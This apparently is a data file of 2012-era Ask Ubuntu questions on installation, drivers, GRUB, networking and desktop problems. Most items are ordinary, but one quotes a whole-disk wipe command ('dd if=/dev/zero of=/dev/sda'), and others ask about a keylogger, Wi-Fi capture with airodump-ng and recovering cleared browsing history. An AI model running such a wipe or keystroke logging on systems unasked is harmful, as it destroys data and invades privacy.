136714	how to force wine into acting like 32-bit windows on 64-bit ubuntu ?	when installing wine on 64-bit ubuntu 12.04 , both 64-bit support and 32-bit support get installed . if i run wine foo.exe where foo.exe is a 64-bit-aware installer , it thinks it 's on 64-bit windows . this would be fine if this mode did n't fail , but in my case , it does ( yet the wine database suggests the app i 'm trying to install should work , presumably as a 32-bit app ) . how do i tell wine ( and winetricks ) to use wine in 32-bit-only mode ?
136718	error message regarding update manager	i 'm getting an error message . the message is : `` encountered a section with no package . e : the package list or file could not be parsed . i tried to following commands in terminal- '' apt-get download header ''
136719	red error sign when opening update manager	when i open update manager it runs for a brief second then a red stop sign appears with no comments . i click close on the sign and update manager closes .
136721	lost files with newly installed 12.04 , is there any way to recover them ?	while trying to upgrade to 12.04 i encountered problems with my internet connection and therefore my upgrade got stuck mid-way . since the computer froze i tried to reboot and constantly got the message : mountall : /lib/x86_64-linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by /lib/libpllibply.so.2 i ended up reinstalling 12.04 with a usb , re-adjusting the size of the partition and now it works fine . the problem is that the new upgrade has left without any of my documents and there were some hugely important ones , is there anyway to recover them ? i can not enter any of the previous lynux versions available on my laptop , any tips ?
136725	getting all the temporary internet files after clear history	i have installed ubuntu 12.04 and google chrome as a browser . i have made google chrome as my default browser . suppose i have cleared my browsing history in google chrome and still i want to get all those files that i have visited on the internet , so is it possible to get all the files after clearing the history clear ?
136729	audio problems in different browsers	i use a lenovo thinkpad x121e with an amd e350 processor and ubuntu 11.10 64bit running . when listening to music on soundcloud or watching videos on youtube from time to time the sound gets chopped , being basically a sped-up and having gaps of ~50ms every ~100ms . this problem occurs using chromium , firefox or opera , even though when for example sound in chromium stops working and i open up firefox audio might sometimes work while still not working in chromium . when i open up `` sound settings '' and open the `` applications '' -tab the program outputting the sound flashes up in approximately the same frequency the sound is chopped , then disappearing again and the message `` no audio-application is recording or playing anything . '' ( these translations might not be 100 % correct since i 'm using the german ubuntu . ) i only had this bug while using browsers so far , i use tomahawk for local music and i never faced anything similar there . what temporarily fixes this almost always is opening up the audio-settings output-tab and then switching the output from `` internal analog '' to `` internal hdmi '' and then back to `` internal analog '' again . after finishing the current track/video and playing the next , most likely the problem occurs again . i would appreciate any help and if there are any log-messages or console-output i could post to make helping me easier , please just tell me . below is the output of lspci : 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : ati technologies inc amd radeon hd 6310 graphicsati 00:01.1 audio device : ati technologies inc wrestler hdmi audio [ radeon hd 6250/6310 ] 00:05.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:06.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:07.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : ati technologies inc sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : ati technologies inc sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : ati technologies inc sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 02:00.0 ethernet controller : atheros communications ar8151 v2.0 gigabit ethernet ( rev c0 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) thanks in advance . edit : i first thought this was flash-related , turns out i 'm using the html5 version of youtube , so i guess i was wrong .
136731	how to resolve thin client log on freezing using ldap + ltsp 12.04 ?	on ubuntu 12.04 i have some kind of problem with ltsp and ldap . sometimes i can log to the server , but sometimes i ca n't ( window freezes on ldm ) log in from the thin client . everything is ok when i log to the server like the local machine , but i have some kind of problem on thin client . pam_mkhomedir.so creates home directory , but i ca n't log in because nothing happened - ldm freezes . this problem does n't exist for `` local '' users ( unix accounts ) and on first logged ldap user . it 's important to mention that in log i can see nothing special . does anybody have a problem with ltsp + ldap on ubuntu 12.04 ? there was n't any problem on the previous versions . when ldm freezes , i get the following in the logs : may 17 11:59:52 bar sshd [ 6066 ] : accepted password for student2 from 192.168.100.22 port 44000 ssh2 may 17 11:59:52 bar sshd [ 6066 ] : pam_unix ( sshd : session ) : session opened for user student2 by ( uid=0 ) may 17 12:00:03 bar sshd [ 6315 ] : subsystem request for sftp by user student2 and nothing else appears for this user .
136733	some system tray icons invisible in gnome classic 12.04	tried all possible ways to give visibility to tray icons in ubuntu 12.04 but no luck : ( dconf-editor - > navigate to desktop - > unity - > panel - > change the value of systray-whitelist to `` all '' gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' set values of above to include pidgin , davmail , etc . please note that only some tray icons are invisible . i still cant see pidgin , davmail , guake tray icons . i am on ubuntu 12.04 gnome classic mode ( gnome-session-fallback ) .
136734	why do some applications in unity start `` maximized '' but not integrated into the panel ?	when i start some applications like gimp or update-manager they start like if they where maximized but they have window decorations , are not integrated into the unity panel and therefore move towards the screen bottom . i also tried to force maximize behaviour via compizconfig-settings-manager but that does n't change anything . what can i do to start these applications maximized with integration into the unity panel ?
136737	gtk applications are n't themed on plasma desktop	i have installed plasma-desktop on my girlfriend 's ubuntu 12.04 box , so now she can log on to a kde desktop , which she likes . however , gtk applications are not themed . here 's a screenshot she took of the problem , left is how gtk apps look , right is how it 'd be desired : what can fix it ? what i 've tried : i tried installing kcm-gtk , and installed a host of other packages ( qtcurve qtcurve-i18n kwin-style-qtcurve kde-style-qtcurve gtk2-engines-qtcurve gtk2-engines-oxygen gtk3-engines-oxygen oxygen-molecule ) , so now i have a `` gtk+ appearance '' item in application appearance under system settings , but as much as i change its theme to oxygen molecule or qtcurve , it does nothing ( apps look just the same ) .
136738	`` can not open : permission denied '' when creating a tar file	i need to to create a archive from my ftp server ( all of the /usr/src/ directory ) using tar command . however i keep getting permission denied error . here is step by step what i am doing : canserhan @ embserv : ~ $ cd /usr/src/ canserhan @ embserv : /usr/src $ ls kernel-headers-2.6.8-2 linux rtlinux-3.2-pre3 kernel-headers-2.6.8-2-386 linux-2.4.21 rtlinux3.2-move kernel-kbuild-2.6-3 linux-2.6.9-rtlfree kernel-source-2.6.8.tar.bz2 rtlinux canserhan @ embserv : /usr/src $ tar cvf rtl_archive.tar /usr/src/ tar : rtl_archive.tar : can not open : permission denied tar : error is not recoverable : exiting now canserhan @ embserv : /usr/src $ what i am doing wrong ? seems like the problem is with my output archive file . but i could not exactly figure out what should i do .
136739	expert help needed due to an insidious trap when triple booting os/w7/ubuntu ... which i fell into	this was going to be my first ubuntu install , aiming to triple boot from a mac book air os , w7 and ubuntu . i used usb sticks for both the w7 and ubuntu . after successfully partitioning using os ( it is apparently required to do it from os because of the mbr/gpt issues ) installing w7 and refit , and having a working dual boot , i proceeded with ubuntu , following this tutorial . i however missed the advanced button that would have allowed to specify that the boot loader should be installed in a non standard way , to the same partition into which linux is being installed . i restarted with no usb drive connected , expecting to see the refit menu with the three oss , but there had been no change : only os and w7 were selectable . that 's when i noticed something was wrong . so i reconnected the usb drive with the ubuntu installer and restarted with the intention of reinstalling . to my surprise i could now select ubuntu from the hard drive , in which case it would boot correctly , or the usb installer , which instead of running normally showed a menu to select the os to boot . and now is when i made the big mistake : i destroyed the partition from os and/or w7 thinking that would allow me to reinstall . now whenever i connect the usb and select it in the refit menu a command prompt that says `` error : no such device : 56756fb3-57a2-4f0c-8068-a9068cb88a18 . `` , and in a new line : `` grub rescue > `` . i tried to find the ubuntu file system with fs but none of the listed partitions that appear with the `` ls '' command were recognized . this does make sense since ubuntu 's file system was presumably destroyed with my hard formatting and destruction of the partition in which i had installed it . i have recreated a partition to no avail . obviously somewhere is stored that linux was once installed , and i need to reset that in order to reinstall . my guess is i need to fix the mbr or the gpt , but i do n't know how to accomplish such a feat or even if that is what i need to do . i know this is very specific , but i believe might happen to other potential triple booters . is there anyone who could please help me ? thanks in advance .
136742	copy and execute file via rdesktop	i successfully conntected to a windows machine in lan via grdesktop . now i would like to have a script which copies a *.bat file and executes it on the windows machine via rdesktop . any suggestions ? thanks in advance .
136749	warning message saying the installation may fail in such circumstances	the warning message says '' 256mb of memory are required only 222 are available . the installation may fail in such circumstances . do you wish to continue anyway ? '' im confused here i have 37gb of free space i even deleted some programs in my computer just to install this ! i already tried accepting it but then , after rebooting and trying to use linux it stuck up in the middle of startup ! and remain there.. i cant even shut my computer down even pressing the power button didnt work after waiting for 16 hours ! what shall i do ? i uninstalled the os and then tried to re install it but the warning message still appears.. even after deleting some of my files its still constant at 222mb available is it a bug ? should i ignore it ?
136751	how can i get local files to appear in unity lenses ?	perhaps i 've mis-understood how the lenses are meant to work , but i find that local files or folders never show up in any of the lenses unless i 've previously opened them . this is true for the file and the video lenses . for background i 've upgraded from 11.10 to 12.04 recently . my ~/video and ~/documents are on a seperate partition which mounts on boot . i 've tried some related fixes from jfgi zeitgeist-daemon -- replace rm -rf ~/.local/share/zeitgeist rm ~/.local/share/zeitgeist/activity.sqlite but to no avail .
136752	how could i install jsf in ubuntu ?	how could i add jsf to my system having jee , tomcat , jboss , glassfish , and apache working ?
136757	how to remove lesstif and install open motif ?	we are having some problems with the lkb installation on ubuntu http : //moin.delph-in.net/lkbfaq and the solution posted on the faq site says : '' the lkb interaction window appears but none of the menus work . this happens when you have lesstif installed . you will have to remove/relocate the lesstif libraries and install open motif . '' how do i remove lesstif libraries and then install open motif ?
136759	how to share a tethered iphone internet connection with virtualbox guest os ( win xp )	i mostly connect to the internet via a usb iphone tethered connection ( mywi app ) . i have just installed windows xp guest os via virtualbox . how do i connect the guest os to the internet via my tethered iphone connection ? thanks in advance .
136764	are there any alternate means of doing password recovery ?	to prevent entering u 12.04 i set my log in password to none ( blank ) since then i can not authenticate as administrator as all possible passwords i tried are rejected . besides , i can not enter recovery mode as the shift key does not work when rebooting . any other way to enter recovery m. ?
136765	flash choppy fullscreen ver 12.04	tried suggested fixes , including flash aid , but still 4od streamed video is choppy full screen . this site slows up browser and plays slow video ? is it the site ? even typing this has slowed as the page tries to load in another tab ? http : //www.channel4.com/programmes/come-dine-with-me/4od
136773	upgrading from 10.10 on my laptop	i 'm currently using 10.10 and it is not supported any more . when i do the upgrade , after install the screen on my laptop is just black and i see nothing . i 've tried to upgrade several times and each time i have to uninstall and reinstall 10.10 and decline the upgrade . i would like to upgrade but until this issue is resolved i ca n't . any help would be greatly appreciated .
136776	when using `byobu` in a putty session can not create new windows	i have an ubuntu 10.04.4 web server , and i have set it to run byobu on session startup . to start with it all seems to work fine , for example f9 brings up the menu and f7 starts the copy/paste process . when i connect to the server using putty from my pc , the problem is that when i press f2 to create a new window , the screen just flashes , and no window is created . i have tried setting putty to use xterm r6 in the function keys settings , as per the man page and mailing list , but have also tried using the default esc [ n~ .
136780	setting up two usb modem-3g mobile broadband	i am trying to connect two usb modem at the same time . i would like ubuntu to recognize both of them as different usb modem ( i.e . ppp0 and ppp1 ) . i am newbie in ubuntu so i would appreciate it if you could explain it step by step . thank you ^_^ is there anyone who can answer this ? at the moment , i 'm using ubuntu 11.10
136781	ubuntu 12.04 grub install fails , installing to wrong device	this is getting quite annoying and google is n't proving to be much of assistance . i 've built a new server and it has a total of five devices . /dev/sda - 2tb hdd /dev/sdb - 2tb hdd /dev/sdc - 2tb hdd /dev/sdd - 2tb hdd /dev/sde - 60gb ssd i 'm trying to install ubuntu 12.04 server amd64 on /dev/sde ( 60gb ssd ) . i use guided partitioning and use the entire disk ( no lvm ) . all seems to be going well , it 's getting near the end of the install and then when it tried to install grub , it fails . i suspect because it says it is trying to install to /dev/sda which i do n't want it to . those four 2tb drives i 'm going to be configuring in an mdadm raid5 array once i have ubuntu installed on the ssd . why is grub trying to install to /dev/sda and not /dev/sde ?
136782	logkeys not working in 12.04	after installing logkeys from synaptic , it does not work , hangs when trying to start , even the output file is not created . compiling solves this particular problem , but the now the output file is blank . how can i know what may be he problem ? and how to solve it ?
136783	ubuntu 12.04 64-bit problems with geforce gtx 580 dual screen:	since ubuntu 12.04 lts has been released i have no luck at all with this release on my desktop or laptop . i 've looked all over the internet and i see allot of other user having problems aswell . i had release 11.10 64-bit running on my desktop without any problem . but with 12.04 i have issues with my geforce gtx850 . the dual screen settings do n't take effect as it should . on my primary screen i have everything working fine , but on the second screen i have a grey backbground , no wallpaper , and it does n't feel like it 's working at all . i have tried to uninstall the nvidia drivers but that does n't work either because then the whole system freezes on me . i have version 295.40 installed of the nvidia driver .
136784	how can i recover `` ubuntu '' or `` ubuntu 2d '' sessions ?	i 'm using ubuntu 12.04 lts . when i upgrade from 11.04 i 've got some errors with nautilus . yesterday i uninstall nautilus and reinstall it . i made the last system update ( with a unity-greeter update ) . since then i ca n't not see ubuntu nor ubuntu 2d sessions ... i can use kde desktop . what is the problem right now ? thank you for helping . edit 1 : i remark that into /usr/share/xsessions ubuntu-2d.desktop and ubuntu.desktop dont exist ...
136788	how do i list the members of a group ?	how can i see all the members of a group in linux ?
136791	unable to log into unity 3d session on ubuntu 12.04 with nvidia graphics card	there has been lots of questions here on how to get unity 3d working with nvidia graphics cards - i 've read many of them , but i 've still not been able to figure out a solution to my problem . my setup i recently installed ubuntu 12.04 on my asus n53sn , which sports an nvidia geforce 550m as well as an integrated intel card ( see the full spec on asus ' website ) . now i 'm having some problems getting unity 3d to work . i never bothered trying to fix it on ubuntu 11.10 , since i was planning an upgrade to 12.04 anyway and expected it to work then . it does n't ... my problem when i log into ubuntu , i select `` ubuntu '' as my desktop environment ( `` ubuntu 2d '' is also available ) . however , every diagnostic i tried says i 'm using unity 2d anyway . attempted solutions i 've tried unity -- reset , which seems to have solved this problem for others , and got the following output ( unity -- replace gives exactly the same , minus the first two lines ) : warning : unity currently default profile , so switching to metacity while resetting the values /home/tomas/.gtkrc-2.0:3 : error : unexpected character ` ; ' , expected character ` } ' unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . segmentation fault ( core dumped ) then i end up in a desktop environment with no window borders , no possibility to resize windows , and where ctrl+alt+t no longer works to open a terminal . luckily , f12 still opens the guake terminal , where i can confirm that i 'm still in unity 2d - only , apparently , broken . what do i do to make unity 3d working ?
136797	usb wireless keyboard and wired mouse do not power on at system boot	this did not use to be an issue but , i am not sure why , my usb keyboard and mouse are not powering on after system boot . i can fix the keyboard by taking out and then plugging back in the usb antennae , which makes it work right away , but the mouse , even if i un-plug it and plug it back in , it takes about two-three minutes until it receives any juice and starts working . any ways i can debug this , or fix it ? thanks !
136801	windows arranged strangely on multiple desktop after detaching external monitor	most of the time when i 'm working , i have 4 windows open ( editor , browser , mail client , terminal ) , and i use the multiple virtual desktops feature to put one on each window . so instead of alt-tabbing , i move to a different desktop . the issue is that when i have them arranged on the desktops correctly and then disconnect my external monitor , they 're all moved to the same desktop . when i plug the external monitor back in , then some of them are moved to the external , whereas some are still on the laptop display . either way , it makes being mobile a very jarring experience . is there some way to `` fix '' or configure this behaviour ?
136803	changing remote control mapping	i just got my remote control working , but some of the buttons do things i do n't like ( e.g . the button with a windows logo on it opens my default music player , the ok button does n't do anything ) . how can i change which commands are mapped to which buttons and map specific commands to buttons that do not appear to have anything mapped to them ?
136809	how to open .xmi files	is there any app that can open .xmi files in ubuntu ? file created in the xmi ( xml metadata interchange ) format , an xml file format most commonly used for exchanging uml diagrams ; stores model design information in a standard xml format used for transferring design information between software programs .
136810	how to install teamviewer ?	how can i install teamviewer in ubuntu ?
136812	missing panel icons at top right	i have been using 11.10 for a month or two , and i always had these icons at the top right ( mail/messenger , battery state , volume control ) : after upgrading to 12.04 , i lost all of these tray entries except the time . after about 5 or 6 hours of wrangling , i found that i needed to reconfigure network settings in recovery mode and whitelist every program using the tray . i managed to do this , but it 's only given me network strength , dropbox , user accounts menu and the top-right system menu . this is all i really need for basic operation of the system , but since i 'm used to having banshee and all my messaging services up there , i 'd really appreciate being able to revert to the old settings . i have read that i need to use `` add to panel '' but i ca n't find a way to do this anywhere . if i do right-click , alt-right-click or windows-alt-right-click on the panel , nothing happens at all , so i ca n't access the menu that way . anyone with any help would be welcomed . thanks in advance . edit : ok , after fiddling with a whole lot of things and several reboots , the missing icons have reappeared . i think what probably did it was purging and re-installing alsa , but i have no idea why . i guess that solves my problem . now i just need to fix my microphone !
136821	ubuntu 12.04 , forced into low graphics mode , server is already active for display	since upgrading to ubuntu 12.04 , the disk checker has run approx . half of the times i powered on my laptop . sometimes i let it complete , but if i 'm in a rush i skip it . some of the times that it runs it comes out fine , some other times it comes up with an error , i ask it to fix , then it says that it ca n't mount /tmp/ . anyway , after a disk check like that ( which 'fixed ' something , but could n't find /tmp/ ) , the laptop rebooted , and i got the dialog about running in low-graphics mode . i had a look around the menus , the restoring to default and restoring to backup neither seemed to do anything ( i clicked on them and the menu just reappeared ) , and editing the config file did nothing either . from there , i went into low graphics mode to find ways to fix this . the first thing i came across was entering sudo apt-get install ubuntu-desktop , after hitting ctrl+alt+f1 . ctrl+alt+f1 did nothing for me , but i opened the terminal , entered the command and it ran , saying that there were no packages that needed installing . ( as an aside note , from the first menu that asks whether i 'd like to use low-graphics mode , try to fix this , terminal , etc , if i select terminal i do n't actually get to the terminal login , just some progress reports about stuff loading ) . next i tried dpkg-reconfigure -phigh -a , which ran for about half an hour , outputting nothing . i rebooted and the problem persisted . from the `` would you like to use low-graphics mode '' menu , i looked at the log files . on the server ( or xserver , ca n't remember ) file , it said fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . so i went , found and deleted /tmp/.x0-lock , ( there was also a /tmp/.x1-lock alongside it ) . that did n't work , but after i rebooted , i found that /tmp/.x0-lock was there again . any help would be greatly appreciated . edit : having looked at xorg.failsafe.log , i found a lot of lines of : ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument i have a dell inspiron 1545 , according to sysinfo i have : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) ( prog-if 00 [ vga controller ] ) lspci gives me the same info : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) i am using the i915 graphics driver .
136822	web development in ubuntu 12.04 , i do n't want to go back to windows	i recently installed ubuntu 12.04 bkz i could never get 11.xx to work on my laptop in dual boot . since i 'm trying to get away from windows 7 i want to install a dreamweaver like tool for web dev ( i 'm web dev n00b ) . i did my research and the best ones to me are bluegriffon & kompozer in terms of clean gui , editor hints , wysiwyg , etc.. but i ca n't get them to work on my ubuntu 12.04. since i 'm new to linux and i know you ca n't just install programs through .exe 's i want to know if anyone has gotten these programs to work in 12.04 ? ? i really do n't want to go to windows/mac..or do i have to if i want to do web dev the right way ? ? thanks in advance !
136831	ca n't boot into fresh install of ubuntu with ahci enabled	i had previously a windows xp installation on a raid1 array ( controlled via intel matrix storage manager ) . i decided to ditch it and install ubuntu 12.04 ( using `` software raid '' ) . so first i reset both disks to non-raid and then launched the ubuntu installation . when it finished and the computer rebooted , the bios froze with this message on the screen : serial ata ahci bios , version isrc 1.20e copyright ( c ) 2003-2008 intel corporation 23 ** this version supports only harddisks & cdrom drives ** please wait . this will take a few seconds . controller bus # 00 , device # 1f , function # 02 : 06 ports , 02 devices i have the gigabyte ga-ep45-ds4 motherboard with the latest bios ( f10b ) . however , i learned there is probably a bug in the sata bios which causes the hang when the previous os was installed in ide mode but is now accessed in ahci mode ( see for example this link ) . so i completely wiped both disks ( by running this command from gparted live cd : dd if=/dev/zero of=/dev/sda bs=1m , although i am not sure if it is enough ) , then ran the ubuntu installation again . unfortunately the problem persists . i am not experienced enough to edit the partition table manually ( as this post suggests ) . is there any other way to work around this issue ? note : my bios offers three modes : ide , ahci and raid ( xhd ) . the latter one causes the same problem as ahci . i am not sure if there is something i can do about it when installing ubuntu , or whether it is rather a os-independent hardware issue ? some new info : i deleted the mbr of both disks using gparted live cd ( in which , ironically , i ca n't run the gparted utility because of some error ) . then i rebooted and the ahci bios successfully detected both disks . then i ran the ubuntu installation ( and created a software raid , although i am not sure if it is relevant here ) . after the installation finished , i rebooted again and the ahci bios froze when detecting the disks . so it seems there is something in the mbr the bios ca n't cope with . i am using the ubuntu alternate cd and to make things even worse , when i try the regular cd , it wo n't even boot - it freezes : - (
136835	broken fonts problem with ubuntu 11.10	upgraded from ubuntu 11.10 to 12.04 . with 11.10 , i had broken fonts . i hoped to get rid of these broken fonts with 12.04 but problem has worsened . any solution ?
136836	ubuntu 12.04 gui glitches	i 'm using ubuntu 12.04 on my pc ( i5 core ; 8gb ; gtx 560 ) and found some weird glitches . first , when i drag qmmp window , it moves kinda spurting second , when i scroll through my bookmarks in firefox , selection moves slow too . here is the video i recorded to show these things http : //www.youtube.com/watch ? v=wd0g0en1lyk what 's the problem ? thanks .
136842	how do i get a bcm4313 with airodump-ng working in monitor mode ?	i noticed that the sta driver ca n't work in monitor mode so i disabled it . i am now using brcmsmac dirver . here is the output from lshw for this wireless card : description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : wlan0 version : 01 serial : 70 : f1 : a1:71 : b2:6f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.2.0-24-generic firmware=n/a ip=192.168.5.185 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbd00000-fbd03fff i stop the network-manager and avahi-daemon and try to start it in monitor mode and mon0 is created . the problem is that airodump-ng never catches anything on all channels . do i need a new card to work in monitor mode ? thanks .
136845	text-block on ubuntu 12.04	i have a problem with the textbox on ubuntu 12.04 . every time i want to edit existing text , either in libreoffice or even a url bar , always appears an annoying text-block ( or something ? ) . can this problem be solved ? is this due to the gtk theme ? screenshot :
136846	hp dv6 graphic chip high temperatur	i have a hp dv6-6180eg with an hd 6770m graphic chip . the driver for the ati card works fine . but i have some problems with the temperatur . out of my fan comes mostly cool air and my cpus are around 50 degrees . i am more concerned about my ati card . although i am not using it , it still warms up very quickly . i already deactivated the card via bios but still no improvement . what can i do ?
136847	ca n't get frequency/channel . code 22	when i log into my older laptop running lubuntu , i get two pop-ups at login ( one after the other ) with this text : an error occurred . ca n't get frequency/channel . code 22 . does anyone know what the fix is for this ? wireless has worked throughout . this error occurs whether or not i 'm using wireless , even when i have the hardware wireless switch turned off , and i 'm connected over the wire . i 'm getting dhcp info and connectivity without problems from my wired connection . after right-clicking on the network icon , i can see that it also believes that my wireless is inactive .
136850	how to create a new quickly application template ?	can not find the answer elsewhere , i 'm asking for a documentation of the process to create a new template for quickly . i 'm interested in writing a pyside ( python + qt4 ) template like the pygtk one . can anyone help me ?
136851	unity freezes when i change the brightness of notebook screen on an acer timeline 4810t	every time that i try to increase or decrease the luminosity of my screen using the keys shortcuts provided in my notebook 's keyboard ( acer timeline 4810t ) , unity freezes and the only thing i can do to recover is restart the computer . there is a app or a command that i use to recover unity ? thanks .
136856	thunderbird download indicator for unity ?	firefox has a great unity progress bar when stuff downloads . however , thunderbird has n't . ( or does it ? ) is there a thunderbird progress bar available for thunderbird ?
136859	how to make ad-hoc network connection ?	i ca n't make ad-hoc from my netbook ( ubuntu 12.04 ) . it has internet source from ethernet . i have tried making from network manager . but it always says 'wireless network disconnected ' and ca n't be detected by neither my other laptop nor my cell phone which have wifi . how can i make adhoc from it ? i have already tried making a connection in network manager a lot of times , but it still ca n't connect and appear notification 'wireless network disconnected ' .
136861	internal fan on a dell xps 1530 stays running post shutdown , am i really getting a shutdown ?	i am loving 12.04lts , fixed my printer issue , but now , on my m1530 dell xps , my internal fan continues to run following shutdown . shutdown occurs very rapid and i do n't really get any confirmation as to where it 's at in the shutdown process . i do have nvidia and have done the procedure ( driver-post release update version activiated ) . has this error been logged elsewhere anyone know ?
136872	how do i add more commands to the hud ?	q : how can i add more commands to the hud 's visibility ? can i make custom hud commands for individual apps ? problem : i noticed on hud supported programs , like firefox and others , there are some commands that the hud does n't see . like gedit can close individual text tabs , but not the whole program itself , unlike chrome which does give the hud this option . this is just one of many examples . the goal should be that the hud can control all functions and options of the program . one ring to rule them all , find them all , bind them , ... etc etc.. .
136873	unable to boot into ubuntu 10-04	had to switch off computer when ubuntu locked up completely ( no mouse or keyboard operation ) . whwn rebooting various messages appeared mainly saying no such file or directory . the target file system does n't have /sbin/init . tried using original cd to view files , but ubunti-1004 would not mount . the followig error messages appeared : error mounting : wrong fs type , bad option , bad superblock on /dev/sda 1 missing codepage or helper program , or other error . in some cases useful info is found in syslog - try dmesg|tail or so . can i recover at least my files ?
136881	`` debconf : dbdriver `` config '' : config.dat is locked by another process : resource temporarily unavailable '' while installing packages	i 'm trying to install the flashybrid but when i enter the apt-get install flashybrid command , i get this error : root @ user-desktop : /home/user # apt-get install flashybrid reading package lists ... done building dependency tree reading state information ... done flashybrid is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0b of additional disk space will be used . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up flashybrid ( 0.15+nmu2 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing flashybrid ( -- configure ) : subprocess post-installation script returned error exit status 1 errors were encountered while processing : flashybrid e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i also tried this one to find what is already using that file : root @ user-desktop : /home/user # lsof | grep /var/cache/debconf/config.dat lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/user/.gvfs output information may be incomplete . dpkg-prec 4672 root 4rw reg 8,6 39658 1697827 /var/cache/debconf/config.dat but i do n't know how to fix this .
136882	configuring compiz from the cli	at work we 're using 11.10 but for some reason it refuse to install ccsm or gconf-editor . i know i can edit the config using gconftool-2 , but does anyone know of a comprehensive list of the available options ? the things i 'm mainly looking for are the option to turn off the unity bar autohide and to turn on window snapping ( ie windows snapping to other windows ) . cheers .
136883	dell e6510 with intel i950 can not detect second display in precise	after a bout of trouble with 10.04 , 10.10 fixed the driver issues with my intel video card . i avoided upgrading for some time , but bit the bullet this weekend . i was able to upgrade and get the box running easily , but when i came back to the office and the docking station i ran into trouble . i have a second monitor and it is being displayed in mirror mode . the resolution is that of the laptop ( so 1/2 of the real-estate is lost ) . unfortunately , i am not sure how the video card decided to even display to the second monitor . xrandr does not even see it . so , dell e6510 on docking station trying to drive a dell u2211h with a dvi connector . displays does not see second display and the `` detect display '' button gives no feedback . $ xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 1366 x 768 , current 1366 x 768 , maximum 1366 x 768 default connected 1366x768+0+0 ( 0x138 ) normal ( normal ) 0mm x 0mm identifier : 0x137 timestamp : 47428 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1366x768 ( 0x138 ) 0.0mhz *current h : width 1366 start 0 end 0 total 1366 skew 0 clock 0.0khz v : height 768 start 0 end 0 total 768 clock 0.0hz lspci output for video : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) subsystem : dell device 040b kernel driver in use : i915 kernel modules : i915 here is a pastebin of pastebins because new users can not actually paste images or more than one link : http : //pastebin.ubuntu.com/987357/ this box did go through a gradual upgrade from 10.10 to 12.04 and i can reinstall , but i 'd rather not . update : quaint , the livecd works fine .
